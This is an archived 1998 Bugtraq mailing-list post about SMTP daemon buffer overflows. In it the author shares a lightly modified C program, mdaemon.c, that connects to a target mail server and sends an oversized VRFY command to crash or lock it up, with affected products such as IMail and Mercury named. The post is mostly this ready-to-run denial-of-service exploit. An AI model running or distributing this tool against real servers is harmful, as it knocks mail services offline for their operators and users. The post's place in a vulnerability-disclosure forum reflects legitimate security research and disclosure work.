[6476] in bugtraq
smtp overflows
daemon@ATHENA.MIT.EDU (Jon Beaton)
Wed Apr 8 13:13:27 1998
Date: Wed, 8 Apr 1998 07:10:25 -0400
Reply-To: Jon Beaton <steven@EFNI.COM>
From: Jon Beaton <steven@EFNI.COM>
To: BUGTRAQ@NETSPACE.ORG
There have been more posts about the buffer overflows on smtp daemons,
so I thought this may be useful. After posting about these attacks on
SLMail and Imail, I found that there were alot more that were still
affected. On the few I've tried on the Mac, like Mercury, it had locked
the server up, much like Appleshare. Anyways, this is just mdaemon.c
with just a few tiny changes, just thought it may be useful. Btw, I just
wanted to note that this will also crash IMail, even though the author
has said it wasn't affected.
Jon
/*
mdaemon.c with a few small changes.
known to lock up the whole server with some daemons on the Mac
Cisc0 @ Undernet
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *hp;
char *buffer;
int sock, i;
if (argc != 2) {
printf("usage: %s <smtp server>\n", argv[0]);
exit(1);
}
hp = gethostbyname(argv[1]);
if (hp==NULL) {
printf("Unknown host: %s\n",argv[1]);
exit(1);
}
bzero((char*) &sin, sizeof(sin));
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(25);
sock = socket(AF_INET, SOCK_STREAM, 0);
connect(sock,(struct sockaddr *) &sin, sizeof(sin));
buffer = (char *)malloc(1000);
sprintf(buffer, "VRFY ");
for (i = 0; i<896; i++)
strcat(buffer, "d");
strcat(buffer, "\r\n");
write(sock, &buffer[0], strlen(buffer));
close(sock);
free(buffer);
}
